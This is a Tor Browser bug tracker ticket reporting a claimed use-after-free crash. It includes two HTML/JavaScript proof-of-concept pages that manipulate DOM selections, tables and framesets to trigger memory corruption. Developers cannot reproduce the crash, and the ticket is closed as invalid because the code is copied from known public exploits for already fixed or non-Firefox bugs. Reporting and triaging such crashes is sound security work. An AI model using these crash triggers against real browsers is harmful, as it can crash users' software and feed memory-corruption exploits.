Opened 4 months ago

Closed 4 months ago

Last modified 4 months ago

#26705 closed project (invalid)

BUG Report ! Use after Free Vulnerability

Reported by: t4rkd3vilz
Owned by: tbb-team
Priority: Very High
Milestone:
Component: Applications/Tor Browser
Version:
Severity: Normal
Keywords:
Cc:
Actual Points:
Parent ID:
Points:
Reviewer:
Sponsor:

Description

Hello,

In Tor Browser, click New Tab.

In the new tab, open HTML with this code:

<style>
body { display: table }
</style>
<script>
function freenabo() {
try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)'); }
}
function go() {
var s = document.getSelection();
window.find("1",true,false,true,false);
s.modify("extend","forward","line");
document.body.append(document.createElement("table"));
freenabo()
}
</script>
<body onload=go()>
<table>
<th>t4rkd3vilz</th>
</table>
<progress></progress>

Then open a second tab.

Code for the second tab:
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['border']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

Result: Tor Browser crashes...

Child Tickets

Attachments (3)

tor2.png (73.3 KB) - added by t4rkd3vilz 4 months ago.
crash scenario
tor1.png (62.8 KB) - added by t4rkd3vilz 4 months ago.
crash tor 3.png (22.0 KB) - added by t4rkd3vilz 4 months ago.
result

Change History (7)

comment:1 Changed 4 months ago by Dbryrtfbcbhgf

Component: Core Tor/Tor → Applications/Tor Browser
Owner: set to tbb-team
Version: Tor: unspecified

comment:2 Changed 4 months ago by boklm

Status: new → needs_information

I tried this in Tor Browser 7.5.6, and 8.0a9, but this did not crash for me.

Changed 4 months ago by t4rkd3vilz

Attachment: tor2.png added

crash scenario

Changed 4 months ago by t4rkd3vilz

Attachment: tor1.png added

Changed 4 months ago by t4rkd3vilz

Attachment: crash tor 3.png added

result

comment:3 Changed 4 months ago by boklm

Some questions:

  • On which OS are you seeing this issue? So far we have tried loading the two HTML pages in two tabs on Linux, Windows 7 and macOS 10.11 without being able to reproduce the issue.
  • In the screenshots, you seem to be loading the pages locally (with file:/// URLs). Does this issue only happen with local pages, or can you reproduce it when loading them over HTTP?
  • In tor2.png it looks like you open the second page using the file manager. Can you reproduce the issue by copy-pasting the address into the URL bar instead of using the file manager to open it? The error in "crash tor 3.png" looks like the error you would get if you try to run more than one instance of the browser. So the issue might be how the file manager has been configured to open new pages in Tor Browser.

comment:4 Changed 4 months ago by gk

Resolution: invalid
Status: needs_information → closed

So, it seems both examples are more or less copy-and-pasted: the first example code from https://www.exploit-db.com/exploits/41660/ aka https://bugzilla.mozilla.org/show_bug.cgi?id=1340138 and the second one from http://www.signalsec.com/publications/UseAfterFree-Exploiting.pdf. The former got fixed a while ago and the latter seemed to affect IE 11, which is why neither crashes Tor Browser. Thus, closing as invalid.

Last edited 4 months ago by gk